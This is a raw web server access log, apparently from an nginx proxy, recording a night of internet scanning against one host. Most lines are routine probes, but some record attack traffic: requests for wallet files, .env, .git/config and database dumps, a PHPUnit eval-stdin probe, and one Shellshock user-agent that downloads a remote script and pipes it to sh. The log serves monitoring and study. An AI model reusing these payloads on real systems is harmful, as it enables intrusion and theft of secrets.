(KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[15/Jan/2026:18:49:38 +0000] 200 - GET http 92.249.249.197 "/" [Client 204.76.203.219] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[15/Jan/2026:18:55:19 +0000] 200 - GET http 92.249.249.197 "/" [Client 34.203.227.71] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/136.0.0.0 Safari/537.36" "-" +[15/Jan/2026:18:59:52 +0000] 200 - GET http 92.249.249.197 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[15/Jan/2026:19:18:47 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 79.124.40.174] [Length 154] [Gzip -] "-" "-" +[15/Jan/2026:19:21:28 +0000] 200 - GET http 92.249.249.197 "/" [Client 147.185.132.222] [Length 568] [Gzip 1.86] "Hello from Palo Alto Networks, find out more about our scans in https://docs-cortex.paloaltonetworks.com/r/1/Cortex-Xpanse/Scanning-activity" "-" +[15/Jan/2026:19:27:20 +0000] 200 - GET http 92.249.249.197 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[15/Jan/2026:19:40:59 +0000] 200 - GET http 92.249.249.197 "/" [Client 204.76.203.219] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[15/Jan/2026:19:42:39 +0000] 200 - GET http 92.249.249.197 "/" [Client 149.50.103.48] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[15/Jan/2026:19:50:20 +0000] 200 - GET http 92.249.249.197 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[15/Jan/2026:20:10:43 +0000] 200 - GET http 92.249.249.197 "/" [Client 109.105.210.98] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" "-" +[15/Jan/2026:20:16:55 +0000] 200 - GET http 92.249.249.197 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[15/Jan/2026:20:19:38 +0000] 200 - GET http 92.249.249.197 "/" [Client 68.183.84.100] [Length 568] [Gzip 1.86] "Mozilla/5.0 (X11; Linux x86_64; rv:142.0) Gecko/20100101 Firefox/142.0" "-" +[15/Jan/2026:20:19:39 +0000] 400 - GET http 92.249.249.197 "/favicon.ico" [Client 127.0.0.1] [Length 230] [Gzip -] "-" "-" +[15/Jan/2026:20:34:19 +0000] 200 - GET http 92.249.249.197 "/" [Client 204.76.203.219] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[15/Jan/2026:20:40:11 +0000] 200 - GET http 92.249.249.197 "/" [Client 176.65.149.159] [Length 1033] [Gzip -] "-" "-" +[15/Jan/2026:20:44:00 +0000] 200 - GET http 92.249.249.197 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[15/Jan/2026:21:08:30 +0000] 405 - POST http 92.249.249.197 "/" [Client 193.142.147.209] [Length 154] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[15/Jan/2026:21:09:23 +0000] 200 - GET http 92.249.249.197 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[15/Jan/2026:21:15:01 +0000] 200 - GET http 92.249.249.197 "/" [Client 149.50.103.48] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[15/Jan/2026:21:21:53 +0000] 404 - GET http 92.249.249.197 "/SDK/webLanguage" [Client 204.76.203.6] [Length 183] [Gzip 3.21] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[15/Jan/2026:21:21:58 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 93.174.93.12] [Length 154] [Gzip -] "-" "-" +[15/Jan/2026:21:26:51 +0000] 404 - GET http 92.249.249.197 "/SDK/webLanguage" [Client 89.42.231.200] [Length 183] [Gzip 3.21] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[15/Jan/2026:21:27:56 +0000] 200 - GET http 92.249.249.197 "/" [Client 204.76.203.18] [Length 1033] [Gzip -] "-" "-" +[15/Jan/2026:21:28:46 +0000] 200 - GET http 92.249.249.197 "/" [Client 204.76.203.219] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[15/Jan/2026:21:33:02 +0000] 200 - GET http 92.249.249.197 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[15/Jan/2026:21:37:21 +0000] 400 - GET http 92.249.249.197 "/" [Client 203.55.131.5] [Length 654] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/133.0.0.0 Safari/537.36" "-" +[15/Jan/2026:21:44:34 +0000] 404 - POST http 127.0.0.1 "/GponForm/diag_Form?images/" [Client 103.160.197.6] [Length 122] [Gzip 1.35] "Hello, World" "-" +[15/Jan/2026:21:44:35 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 103.160.197.6] [Length 154] [Gzip -] "-" "-" +[15/Jan/2026:21:45:07 +0000] 200 - GET http localhost-nginx-proxy-manager "/" [Client 51.158.205.47] [Length 1033] [Gzip -] "masscan/1.3 (https://github.com/robertdavidgraham/masscan)" "-" +[15/Jan/2026:22:00:05 +0000] 200 - GET http 92.249.249.197 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[15/Jan/2026:22:22:36 +0000] 200 - GET http 92.249.249.197 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[15/Jan/2026:22:24:33 +0000] 200 - GET http 92.249.249.197 "/" [Client 204.76.203.219] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[15/Jan/2026:22:45:08 +0000] 200 - GET http 92.249.249.197 "/" [Client 149.50.103.48] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[15/Jan/2026:22:48:10 +0000] 200 - GET http 92.249.249.197 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[15/Jan/2026:23:00:07 +0000] 200 - GET http 92.249.249.197 "/" [Client 87.121.84.38] [Length 1033] [Gzip -] "-" "-" +[15/Jan/2026:23:03:38 +0000] 200 - GET http 92.249.249.197 "/" [Client 87.121.84.15] [Length 1033] [Gzip -] "Mozilla/1.0" "-" +[15/Jan/2026:23:12:08 +0000] 404 - GET http 92.249.249.197 "/s47n3xv3h40jkifl" [Client 34.138.101.23] [Length 122] [Gzip 1.35] "Mozilla/5.0" "-" +[15/Jan/2026:23:12:08 +0000] 404 - GET http 92.249.249.197 "/s47n3xv3h40jkifl.php" [Client 34.138.101.23] [Length 122] [Gzip 1.35] "Mozilla/5.0" "-" +[15/Jan/2026:23:12:09 +0000] 404 - GET http 92.249.249.197 "/wallet.dat" [Client 34.138.101.23] [Length 122] [Gzip 1.35] "Mozilla/5.0" "-" +[15/Jan/2026:23:12:09 +0000] 404 - GET http 92.249.249.197 "/.wallet.dat" [Client 34.138.101.23] [Length 122] [Gzip 1.35] "Mozilla/5.0" "-" +[15/Jan/2026:23:12:09 +0000] 404 - GET http 92.249.249.197 "/keystore" [Client 34.138.101.23] [Length 122] [Gzip 1.35] "Mozilla/5.0" "-" +[15/Jan/2026:23:12:09 +0000] 404 - GET http 92.249.249.197 "/utc" [Client 34.138.101.23] [Length 122] [Gzip 1.35] "Mozilla/5.0" "-" +[15/Jan/2026:23:12:10 +0000] 404 - GET http 92.249.249.197 "/wallet.json" [Client 34.138.101.23] [Length 122] [Gzip 1.35] "Mozilla/5.0" "-" +[15/Jan/2026:23:12:10 +0000] 404 - GET http 92.249.249.197 "/backup.json" [Client 34.138.101.23] [Length 122] [Gzip 1.35] "Mozilla/5.0" "-" +[15/Jan/2026:23:12:10 +0000] 404 - GET http 92.249.249.197 "/default_wallet" [Client 34.138.101.23] [Length 122] [Gzip 1.35] "Mozilla/5.0" "-" +[15/Jan/2026:23:12:10 +0000] 404 - GET http 92.249.249.197 "/electrum.dat" [Client 34.138.101.23] [Length 122] [Gzip 1.35] "Mozilla/5.0" "-" +[15/Jan/2026:23:12:11 +0000] 404 - GET http 92.249.249.197 "/default_wallet.dat" [Client 34.138.101.23] [Length 122] [Gzip 1.35] "Mozilla/5.0" "-" +[15/Jan/2026:23:12:11 +0000] 404 - GET http 92.249.249.197 "/.env" [Client 34.138.101.23] [Length 122] [Gzip 1.35] "Mozilla/5.0" "-" +[15/Jan/2026:23:12:11 +0000] 404 - GET http 92.249.249.197 "/.git/config" [Client 34.138.101.23] [Length 122] [Gzip 1.35] "Mozilla/5.0" "-" +[15/Jan/2026:23:12:11 +0000] 404 - GET http 92.249.249.197 "/backup.sql" [Client 34.138.101.23] [Length 122] [Gzip 1.35] "Mozilla/5.0" "-" +[15/Jan/2026:23:12:12 +0000] 404 - GET http 92.249.249.197 "/database.sql" [Client 34.138.101.23] [Length 122] [Gzip 1.35] "Mozilla/5.0" "-" +[15/Jan/2026:23:12:12 +0000] 404 - GET http 92.249.249.197 "/dump.rdb" [Client 34.138.101.23] [Length 122] [Gzip 1.35] "Mozilla/5.0" "-" +[15/Jan/2026:23:12:12 +0000] 404 - GET http 92.249.249.197 "/admin/config.php.bak" [Client 34.138.101.23] [Length 122] [Gzip 1.35] "Mozilla/5.0" "-" +[15/Jan/2026:23:13:25 +0000] 200 - GET http 92.249.249.197 "/" [Client 204.76.203.219] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[15/Jan/2026:23:13:27 +0000] 200 - GET http 92.249.249.197 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[15/Jan/2026:23:37:51 +0000] 200 - GET http 92.249.249.197 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[15/Jan/2026:23:41:36 +0000] 404 - GET http 92.249.249.197 "/SDK/webLanguage" [Client 5.61.209.92] [Length 183] [Gzip 3.21] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[15/Jan/2026:23:50:51 +0000] 404 - GET http 92.249.249.197 "/bins/" [Client 204.76.203.18] [Length 150] [Gzip -] "-" "-" +[16/Jan/2026:00:03:33 +0000] 200 - GET http 92.249.249.197 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[16/Jan/2026:00:07:11 +0000] 200 - GET http 92.249.249.197 "/" [Client 204.76.203.219] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[16/Jan/2026:00:08:57 +0000] 400 - GET http 92.249.249.197 "/manager/text/list" [Client 20.29.58.2] [Length 252] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" +[16/Jan/2026:00:13:06 +0000] 200 - GET http 92.249.249.197 "/" [Client 149.50.103.48] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[16/Jan/2026:00:18:16 +0000] 405 - POST http 92.249.249.197 "/" [Client 193.142.147.209] [Length 154] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[16/Jan/2026:00:29:45 +0000] 200 - GET http 92.249.249.197 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[16/Jan/2026:00:44:09 +0000] 404 - GET http 127.0.0.1 "/logon.htm" [Client 93.123.72.132] [Length 150] [Gzip -] "Hello World" "-" +[16/Jan/2026:00:46:33 +0000] 404 - GET http 92.249.249.197 "/admin/config.php" [Client 102.22.20.125] [Length 150] [Gzip -] "xfa1,nvdorz,nvd0rz" "-" +[16/Jan/2026:00:51:07 +0000] 404 - POST http 92.249.249.197 "/goform/formJsonAjaxReq" [Client 91.224.92.14] [Length 150] [Gzip -] "Go-http-client/1.1" "http://92.249.249.197:80/home.asp" +[16/Jan/2026:00:52:21 +0000] 404 - POST http 92.249.249.197 "/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 192.159.99.95] [Length 150] [Gzip -] "Mozilla/5.0 (rondo2012@atomicmail.io)" "-" +[16/Jan/2026:00:52:21 +0000] 200 - GET http 92.249.249.197 "/" [Client 192.159.99.95] [Length 0] [Gzip -] "() { :; }; /bin/bash -c \x22(wget -qO- http://41.231.37.153/rondo.qre.sh||busybox wget -qO- http://41.231.37.153/rondo.qre.sh||curl -s http://41.231.37.153/rondo.qre.sh)|sh\x22& # rondo2012@atomicmail.io" "-" +[16/Jan/2026:00:53:42 +0000] 200 - GET http 92.249.249.197 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[16/Jan/2026:01:01:08 +0000] 200 - GET http 92.249.249.197 "/" [Client 204.76.203.219] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[16/Jan/2026:01:17:01 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 162.142.125.220] [Length 154] [Gzip -] "-" "-" +[16/Jan/2026:01:17:05 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 162.142.125.220] [Length 154] [Gzip -] "-" "-" +[16/Jan/2026:01:19:12 +0000] 200 - GET http 92.249.249.197 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[16/Jan/2026:01:37:41 +0000] 404 - GET http 92.249.249.197 "/SDK/webLanguage" [Client 5.183.209.196] [Length 183] [Gzip 3.21] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[16/Jan/2026:01:43:53 +0000] 200 - GET http 92.249.249.197 "/" [Client 149.50.103.48] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[16/Jan/2026:01:43:57 +0000] 200 - GET http 92.249.249.197 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[16/Jan/2026:01:53:15 +0000] 200 - GET http 92.249.249.197 "/" [Client 204.76.203.219] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[16/Jan/2026:02:03:51 +0000] 200 - GET http 92.249.249.197 "/" [Client 176.65.149.159] [Length 1033] [Gzip -] "-" "-" +[16/Jan/2026:02:06:11 +0000] 400 - GET http 92.249.249.197 "/" [Client 185.242.226.107] [Length 654] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.190 Safari/537.36" "-" +[16/Jan/2026:02:10:15 +0000] 200 - GET http 92.249.249.197 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[16/Jan/2026:02:16:59 +0000] 200 - GET http 92.249.249.197 "/" [Client 116.212.132.70] [Length 1033] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:77.0) Gecko/20100101 Firefox/77.0" "-" +[16/Jan/2026:02:24:24 +0000] 404 - GET http 92.249.249.197 "/SDK/webLanguage" [Client 93.123.72.132] [Length 183] [Gzip 3.21] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[16/Jan/2026:02:34:59 +0000] 200 - GET http 92.249.249.197 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[16/Jan/2026:02:46:00 +0000] 200 - GET http 92.249.249.197 "/" [Client 204.76.203.219] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[16/Jan/2026:02:47:08 +0000] 404 - GET http 92.249.249.197 "/bin/" [Client 204.76.203.18] [Length 150] [Gzip -] "-" "-" +[16/Jan/2026:02:47:49 +0000] 200 - GET http localhost-nginx-proxy-manager "/" [Client 147.185.132.88] [Length 1033] [Gzip -] "Hello from Palo Alto Networks, find out more about our scans in https://docs-cortex.paloaltonetworks.com/r/1/Cortex-Xpanse/Scanning-activity" "-" +[16/Jan/2026:02:57:47 +0000] 200 - GET http 92.249.249.197 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[16/Jan/2026:03:18:17 +0000] 200 - GET http 92.249.249.197 "/" [Client 149.50.103.48] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[16/Jan/2026:03:20:11 +0000] 404 - GET http profibot.direct.quickconnect.to "/.env" [Client 91.244.197.123] [Length 122] [Gzip 1.35] "python-requests/2.32.4" "-" +[16/Jan/2026:03:23:32 +0000] 200 - GET http 92.249.249.197 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[16/Jan/2026:03:33:29 +0000] 404 - GET http 92.249.249.197 "/index.asp" [Client 204.76.203.20] [Length 122] [Gzip 1.35] "Hello World/1.0" "-" +[16/Jan/2026:03:37:43 +0000] 405 - POST http 92.249.249.197 "/" [Client 193.142.147.209] [Length 154] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[16/Jan/2026:03:41:54 +0000] 200 - GET http 92.249.249.197 "/" [Client 204.76.203.219] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[16/Jan/2026:03:44:08 +0000] 404 - GET http 92.249.249.197 "/.env" [Client 78.153.140.224] [Length 150] [Gzip -] "Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:42.0) Gecko/20100101 Firefox/42.0" "-" +[16/Jan/2026:03:44:08 +0000] 404 - GET http 92.249.249.197 "/api/.env" [Client 78.153.140.224] [Length 552] [Gzip -] "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/534.14 (KHTML, like Gecko) Chrome/9.0.600.0 Safari/534.14" "-" +[16/Jan/2026:03:46:50 +0000] 404 - GET http 92.249.249.197 "/.env" [Client 195.178.110.190] [Length 183] [Gzip 3.21] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.100 Safari/537.36" "-" +[16/Jan/2026:03:47:00 +0000] 404 - GET http 92.249.249.197 "/.env" [Client 195.178.110.190] [Length 122] [Gzip 1.35] "Mozilla/5.0 (Mobile; Windows Phone 8.1; Android 4.0; ARM; Trident/7.0; Touch; rv:11.0; IEMobile/11.0; NOKIA; Lumia 929) like iPhone OS 7_0_3 Mac OS X AppleWebKit/537 (KHTML, like Gecko) Mobile Safari/537" "-" +[16/Jan/2026:03:50:05 +0000] 200 - GET http 92.249.249.197 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[16/Jan/2026:03:52:57 +0000] 400 - - http localhost "-" [Client 20.163.61.136] [Length 154] [Gzip -] "-" "-" +[16/Jan/2026:03:57:13 +0000] 200 - GET http 92.249.249.197 "/" [Client 162.142.125.124] [Length 568] [Gzip 1.86] "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)" "-" +[16/Jan/2026:03:57:14 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 162.142.125.124] [Length 154] [Gzip -] "-" "-" +[16/Jan/2026:03:57:14 +0000] 400 - GET http 92.249.249.197 "/favicon.ico" [Client 127.0.0.1] [Length 230] [Gzip -] "-" "-" +[16/Jan/2026:03:57:18 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 162.142.125.124] [Length 154] [Gzip -] "-" "-" +[16/Jan/2026:03:57:21 +0000] 404 - GET http 92.249.249.197 "/.well-known/security.txt" [Client 162.142.125.124] [Length 122] [Gzip 1.35] "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)" "-" +[16/Jan/2026:03:57:26 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 162.142.125.124] [Length 154] [Gzip -] "-" "-" +[16/Jan/2026:04:00:35 +0000] 404 - POST http 92.249.249.197 "/goform/formJsonAjaxReq" [Client 91.224.92.14] [Length 150] [Gzip -] "Go-http-client/1.1" "http://92.249.249.197:80/home.asp" +[16/Jan/2026:04:06:17 +0000] 200 - GET http 92.249.249.197 "/" [Client 185.186.15.157] [Length 1033] [Gzip -] "-" "-" +[16/Jan/2026:04:14:55 +0000] 200 - GET http 92.249.249.197 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[16/Jan/2026:04:22:31 +0000] 400 - GET http 92.249.249.197 "/" [Client 3.130.96.91] [Length 654] [Gzip -] "cypex.ai/scanning Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) Chrome/126.0.0.0 Safari/537.36" "-" +[16/Jan/2026:04:23:35 +0000] 404 - POST http 92.249.249.197 "/goform/formJsonAjaxReq" [Client 91.224.92.14] [Length 150] [Gzip -] "Go-http-client/1.1" "http://92.249.249.197:80/home.asp" +[16/Jan/2026:04:33:32 +0000] 200 - GET http 92.249.249.197 "/" [Client 204.76.203.219] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[16/Jan/2026:04:37:54 +0000] 200 - GET http 92.249.249.197 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[16/Jan/2026:04:44:21 +0000] 200 - GET http 92.249.249.197 "/" [Client 149.50.103.48] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[16/Jan/2026:05:02:24 +0000] 200 - GET http 92.249.249.197 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[16/Jan/2026:05:04:42 +0000] 200 - GET http 92.249.249.197 "/" [Client 35.203.211.243] [Length 568] [Gzip 1.86] "Hello from Palo Alto Networks, find out more about our scans in https://docs-cortex.paloaltonetworks.com/r/1/Cortex-Xpanse/Scanning-activity" "-" +[16/Jan/2026:05:19:13 +0000] 400 - GET http 92.249.249.197 "/" [Client 85.217.140.10] [Length 252] [Gzip -] "Mozilla/5.0 (compatible; ModatScanner/1.2; +https://modat.io/)" "-" +[16/Jan/2026:05:29:19 +0000] 200 - GET http 92.249.249.197 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[16/Jan/2026:05:29:22 +0000] 200 - GET http 92.249.249.197 "/" [Client 204.76.203.219] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" 